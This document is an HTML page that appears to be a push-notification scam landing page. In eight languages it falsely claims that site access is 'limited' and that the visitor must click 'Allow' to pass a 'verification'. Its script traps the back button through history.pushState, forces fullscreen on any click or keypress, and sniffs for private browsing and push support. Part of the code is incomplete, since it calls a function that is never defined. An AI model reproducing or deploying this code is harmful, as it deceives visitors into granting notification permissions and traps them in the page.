<!DOCTYPE html>
<html>


<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
    <meta charset="UTF-8">
    <title>Access website</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,height=device-height,initial-scale=1,minimum-scale=1">
    <link rel="icon" type="image/png" sizes="16x16" href="icon.png">
    <style>
        body,
        html {
            background-color: #3562b3;
            height: 100%
        }

        body {
            -moz-osx-font-smoothing: grayscale;
            -moz-user-select: none;
            -ms-user-select: none;
            -webkit-font-smoothing: antialiased;
            -webkit-user-select: none;
            color: #fff;
            font: 400 16px/1.25 Roboto, Helvetica, Arial, sans-serif;
            margin: 0;
            overflow: hidden;
            text-align: center;
            user-select: none;
            width: 100%
        }

        .isHide {
            display: none !important
        }

        .w {
            height: 100%;
            width: 100%
        }

        .w,
        .w__wIc {
            position: absolute
        }

        .w__wIc {
            -webkit-animation: a 2s ease-in-out infinite;
            animation: a 2s ease-in-out infinite;
            height: 65px;
            left: 600px;
            width: 65px
        }

        .isFirefox .w__wIc {
            left: 750px
        }

        .isYandex .w__wIc {
            left: auto;
            right: 500px;
            top: 50px
        }

        .isPopup .w__wIc {
            left: 450px;
            top: 20px
        }

        .isPopup.isYandex .w__wIc {
            left: auto
        }

        body:-moz-full-screen .w__wIc {
            left: 450px
        }

        body:-webkit-full-screen .w__wIc {
            left: 450px
        }

        body:-ms-fullscreen .w__wIc {
            left: 450px
        }

        body:fullscreen .w__wIc {
            left: 450px
        }

        body.isOpera:-webkit-full-screen .w__wIc {
            left: 550px
        }

        body.isYandex:-webkit-full-screen .w__wIc {
            left: auto
        }

        body.isAndroid .w__wIc {
            -webkit-animation-name: b;
            animation-name: b;
            bottom: 20px;
            left: 0;
            margin: auto;
            right: 0
        }

        .w__ic {
            fill: #fff;
            height: 100%;
            transform: rotate(90deg);
            width: 100%
        }

        .isYandex .w__ic {
            transform: rotate(-90deg)
        }

        .isAndroid .w__ic {
            transform: rotate(180deg)
        }

        .w__cnt {
            left: 2.5%;
            position: absolute;
            right: 2.5%;
            top: 50%;
            transform: translateY(-50%)
        }

        .isAndroid .w__cnt {
            top: 2.5%;
            transform: none
        }

        .w__t {
            font-size: 24px;
            font-weight: 700
        }

        .w__tx {
            font-size: 18px;
            margin-top: 1.5%
        }

        .w__tx span {
            font-weight: 700
        }

        .w__tx span:before {
            content: "«"
        }

        .w__tx span:after {
            content: "»"
        }

        .msg {
            background-color: rgba(0, 0, 0, .75);
            height: 100%;
            left: 0;
            position: fixed;
            top: 0;
            width: 100%
        }

        .msg__tx {
            font-size: 32px;
            margin-top: 10%
        }

        @-webkit-keyframes a {

            0%,
            20%,
            50%,
            80%,
            to {
                transform: translateX(0)
            }

            40% {
                transform: translateX(-100%)
            }

            60% {
                transform: translateX(-50%)
            }
        }

        @keyframes a {

            0%,
            20%,
            50%,
            80%,
            to {
                transform: translateX(0)
            }

            40% {
                transform: translateX(-100%)
            }

            60% {
                transform: translateX(-50%)
            }
        }

        @-webkit-keyframes b {

            0%,
            20%,
            50%,
            80%,
            to {
                transform: translateY(0)
            }

            40% {
                transform: translateY(-100%)
            }

            60% {
                transform: translateY(-50%)
            }
        }

        @keyframes b {

            0%,
            20%,
            50%,
            80%,
            to {
                transform: translateY(0)
            }

            40% {
                transform: translateY(-100%)
            }

            60% {
                transform: translateY(-50%)
            }
        }

        @media (min-width:425px) {
            .msg__tx {
                font-size: 52px
            }
        }

        @media (min-width:650px) {
            .w__t {
                font-size: 42px
            }

            .w__tx {
                font-size: 28px
            }
        }
    </style>
</head>

<body>
    <div class="w">
        <div class="w__wIc"><svg class="w__ic" xmlns="http://www.w3.org/2000/svg" version="1.1" viewBox="0 0 466.678 466.678">
                <path d="M411.631,240.58L240.538,463.132c-1.714,2.234-4.386,3.546-7.196,3.546c-2.825,0-5.482-1.312-7.196-3.546L55.038,240.58 c-1.253-1.638-1.882-3.582-1.882-5.539c0-1.921,0.605-3.848,1.835-5.467c2.444-3.257,6.783-4.472,10.578-2.979l113.3,44.757 L178.856,9.079C178.868,4.061,182.923,0,187.947,0h90.774c5.024,0,9.079,4.061,9.091,9.079l-0.012,262.273l113.298-44.763 c3.8-1.492,8.139-0.278,10.592,2.985C414.149,232.837,414.138,237.341,411.631,240.58z"></path>
            </svg></div>
        <div class="w__cnt">
            <div class="w__t"></div>
            <div class="w__tx"></div>
        </div>
    </div>
    <div class="msg isHide">
        <div class="msg__tx"></div>
    </div>
    <script>
        ! function(t) {
            var o = {};

            function i(e) {
                if (o[e]) return o[e].exports;
                var n = o[e] = {
                    i: e,
                    l: !1,
                    exports: {}
                };
                return t[e].call(n.exports, n, n.exports, i), n.l = !0, n.exports
            }
            i.m = t, i.c = o, i.d = function(e, n, t) {
                i.o(e, n) || Object.defineProperty(e, n, {
                    enumerable: !0,
                    get: t
                })
            }, i.r = function(e) {
                "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, {
                    value: "Module"
                }), Object.defineProperty(e, "__esModule", {
                    value: !0
                })
            }, i.t = function(n, e) {
                if (1 & e && (n = i(n)), 8 & e) return n;
                if (4 & e && "object" == typeof n && n && n.__esModule) return n;
                var t = Object.create(null);
                if (i.r(t), Object.defineProperty(t, "default", {
                        enumerable: !0,
                        value: n
                    }), 2 & e && "string" != typeof n)
                    for (var o in n) i.d(t, o, function(e) {
                        return n[e]
                    }.bind(null, o));
                return t
            }, i.n = function(e) {
                var n = e && e.__esModule ? function() {
                    return e.default
                } : function() {
                    return e
                };
                return i.d(n, "a", n), n
            }, i.o = function(e, n) {
                return Object.prototype.hasOwnProperty.call(e, n)
            }, i.p = "", i(i.s = 2)
        }([function(e, n) {
            if (0 === "".length) {
                var t = function() {
                    void 0 !== this.requestFullScreen ? this.requestFullScreen() : void 0 !== this.webkitRequestFullScreen ? this.webkitRequestFullScreen() : void 0 !== this.mozRequestFullScreen && this.mozRequestFullScreen()
                };
                document.body.addEventListener("keydown", t), document.body.addEventListener("click", t)
            }
        }, , function(e, n, t) {
            "use strict";
            t.r(n);
            var u = function() {
                    var e = location.search.split("#")[0].split("?")[1];
                    if (void 0 === e) return null;
                    var o = {};
                    return e.split("&").forEach(function(e) {
                        var n = e.split("=");
                        if (2 === n.length) o[n[0]] = n[1] || null;
                        else {
                            var t = n[0];
                            n.shift(), o[t] = n.join("=")
                        }
                    }), o
                },
                o = u();
            if (null !== o && void 0 !== o.bbr && "1" === o.bbr) {
                var i = document.title,
                    r = location.pathname + location.search;
                history.pushState(null, i, r), window.addEventListener("popstate", function() {
                    history.pushState({}, i, r)
                })
            }
            t(0);
            var p = {
                    ua: navigator.userAgent,
                    m: function(n) {
                        var e = "normal",
                            t = "private";

                        function o() {
                            return n(t)
                        }

                        function i() {
                            return n(e)
                        }
                        if ("safari" === p.n) try {
                            return window.openDatabase(null, null, null, null), n(e)
                        } catch (e) {
                            return n(t)
                        } else if ("firefox" === p.n) {
                            var r = indexedDB.open("test.html");
                            r.addEventListener("error", o), r.addEventListener("success", i)
                        } else {
                            if ("edge" === p.n) return void 0 !== window.indexedDB || void 0 === window.PointerEvent && void 0 === window.MSPointerEvent ? n(e) : n(t);
                            if ("opera" !== p.n && "yandex" !== p.n && "chrome" !== p.n) return n("unknown");
                            window.webkitRequestFileSystem(window.TEMPORARY, 1, i, o)
                        }
                    },
                    get n() {
                        var e = !!window.opr && !!opr.addons || !!window.opera || 0 < this.ua.indexOf("OPR/index.html"),
                            n = "undefined" != typeof InstallTrigger,
                            t = /constructor/i.test(window.HTMLElement) || /(MacPPC|MacIntel|Mac_PowerPC|Macintosh)/.test(this.ua),
                            o = !!window.chrome && /Google Inc/.test(navigator.vendor),
                            i = 0 < this.ua.indexOf("YaBrowser") || 0 < this.ua.indexOf("Yowser"),
                            r = /UBrowser/.test(this.ua),
                            s = /Edge\//.test(this.ua),
                            a = null;
                        return e ? a = "opera" : n ? a = "firefox" : i ? a = "yandex" : r ? a = "uc" : s ? a = "edge" : o ? a = "chrome" : t && (a = "safari"), a
                    },
                    get d() {
                        var n = {
                                webOS: "webOS",
                                iPhone: "iPhone",
                                iPad: "iPad",
                                iPod: "iPod",
                                mac: "(MacPPC|MacIntel|Mac_PowerPC|Macintosh)",
                                blackBerry: "BlackBerry|BB|PlayBook",
                                windows: "Windows NT",
                                windowPhone: "Windows Phone",
                                android: "Android"
                            },
                            t = null;
                        return Object.keys(n).some(function(e) {
                            if (null !== p.ua.match(new RegExp(n[e], "i"))) return t = e, !0
                        }), t
                    }
                },
                v = p,
                w = u();

            var g = function(n) {
                    if (!(void 0 !== window.navigator && void 0 !== navigator.serviceWorker && void 0 !== window.PushManager && void 0 !== window.Notification)) return n(!1, "unsupported");
                    v.m(function(e) {
                        return "private" === e ? n(!1, e) : "unknown" === e ? n(!1, e) : n(!0, "supported")
                    })
                },
                b = {
                    k: "",
                    t: {},
                    set: function(e) {
                        void 0 !== window.navigator && void 0 !== navigator.language && (b.k = navigator.language.slice(0, 2)), void 0 === e[b.k] && (b.k = "en"), b.t = e[b.k]
                    },
                    get: function(e) {
                        return b.t[e]
                    }
                },
                y = b;

            function P(e) {
                l({
                    a: e ? "success" : "close"
                }), null !== window.opener && void 0 !== window.opener && close(), document.querySelector(".w").classList.add("isHide"), document.querySelector(".msg").classList.remove("isHide")
            }

            y.set({
                en: {
                    t: "Access to the website is limited",
                    tx: "To access the website content, click <span>Allow</span>!",
                    msg: "You have successfully passed the verification!<br>Now you can close the window."
                },
                uk: {
                    t: "Доступ до веб-сайту обмежений",
                    tx: "Щоб отримати доступ до вмісту веб-сайту, натисніть <span>Дозволити</span>!",
                    msg: "Ви успішно пройшли перевірку!<br>Тепер ви можете закрити вікно."
                },
                pl: {
                    t: "Dostęp do strony internetowej jest ograniczony",
                    tx: "Aby uzyskać dostęp do zawartości witryny, kliknij opcję <span>Pozwól</span>!",
                    msg: "Pomyślnie przeszedłeś weryfikację!<br>Teraz możesz zamknąć okno."
                },
                ru: {
                    t: "Доступ к веб-сайту ограничен",
                    tx: "Чтобы получить доступ к содержимому веб-сайта, нажмите <span>Разрешить</span>!",
                    msg: "Вы успешно прошли проверку!<br>Теперь вы можете закрыть окно ..."
                },
                fr: {
                    t: "L'accès au site est limité",
                    tx: "Pour accéder au contenu du site, cliquez <span>Autoriser</span>!",
                    msg: "Vous avez réussi le test!<br>Maintenant vous pouvez fermer la fenêtre"
                },
                de: {
                    t: "Der Zugriff auf die Website ist begrenzt",
                    tx: "Um auf den Inhalt der Website zuzugreifen, klicken Sie auf <span>Erlaube</span>!",
                    msg: "Sie haben den Test erfolgreich bestanden!<br>Jetzt können Sie das Fenster schließen"
                },
                es: {
                    t: "El acceso al sitio web es limitado",
                    tx: "Para acceder al contenido del sitio web, haga clic <span>Permitir</span>!",
                    msg: "Has pasado la prueba con éxito!<br>Ahora puedes cerrar la ventana"
                },
                th: {
                    t: "การเข้าถึงเว็บไซต์มีจำนวน จำกัด",
                    tx: "หากต้องการเข้าถึงเนื้อหาเว็บไซต์คลิก <span>อนุญาต</span>!",
                    msg: "คุณผ่านการตรวจสอบสำเร็จแล้ว!<br>ตอนนี้คุณสามารถปิดหน้าต่างได้"
                }
            }), null !== window.opener && document.body.classList.add("isPopup"), "android" === v.d && document.body.classList.add("isAndroid"), "yandex" === v.n && document.body.classList.add("isYandex"), "firefox" === v.n && document.body.classList.add("isFirefox"), "opera" === v.n && document.body.classList.add("isOpera"), document.querySelector(".w__t").textContent = y.get("t"), document.querySelector(".w__tx").innerHTML = y.get("tx"), document.querySelector(".msg__tx").innerHTML = y.get("msg")
        }]);
    </script>
</body>


</html>
